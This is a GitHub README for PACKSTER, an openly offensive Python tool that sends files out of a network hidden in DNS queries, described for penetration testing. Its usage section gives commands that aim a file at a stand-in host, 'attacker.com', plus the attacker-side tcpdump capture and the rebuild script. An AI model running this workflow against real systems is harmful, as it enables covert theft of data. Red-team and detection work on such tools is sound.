Skip to content

Sayan690/Packster

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

18 Commits
 
 
 
 
 
 
 
 
 
 
 
 

Repository files navigation

PACKSTER

Overview

PACKSTER is a powerful exfiltration tool designed for demonstrating efficient data exfiltration and security testing. It allows for controlled and stealthy data exfiltration by utilizing DNS queries, making it a valuable tool for cybersecurity professionals and penetration testers.

Features

  • Fast and reliable data exfiltration
  • Supports multiple transport methods
  • Customizable payload handling
  • Stealth mode for evasion techniques
  • Logging and error handling for debugging

Watch The Demo

Packster Demo

Installation

Prerequisites

Ensure you have Python installed on your system. PACKSTER requires Python 3.x.

Clone The Repository

git clone https://github.com/Sayan690/packster.git
cd packster

OR

Compile It Locally

Requirements - pyinstaller

Clone The Repository

git clone https://github.com/Sayan690/packster.git
cd packster

Compile Using Pyinstaller

pyinstaller -F packety.py --icon=resources/packster.ico

Install Dependencies

pip install -r requirements.txt

Usage

To run PACKSTER, follow these steps:

  • Start the listener on the attacker side
tcpdump -i any -w capture.pcap
.\packster.exe -f C:\Path\To\File -a attacker.com

./packster.exe -f /Path/To/File -a 10.10.10.10
  • After the process exits printing "done.", exit out from tcpdump, and run filtrz.py
python3 filtrz.py -a attacker.com -c capture.pcap -o output_file_name.txt

Disclaimer

PACKSTER is intended for educational and security testing purposes only. The author is not responsible for any misuse of this tool.

Author

Developed by Sayan Ray @BareBones90

License

This project is licensed under the MIT License - see the LICENSE file for details.

About

A DNS Based Python Data Exfiltrator

Topics

Resources

License

Stars

Watchers

Forks

Packages

No packages published

Languages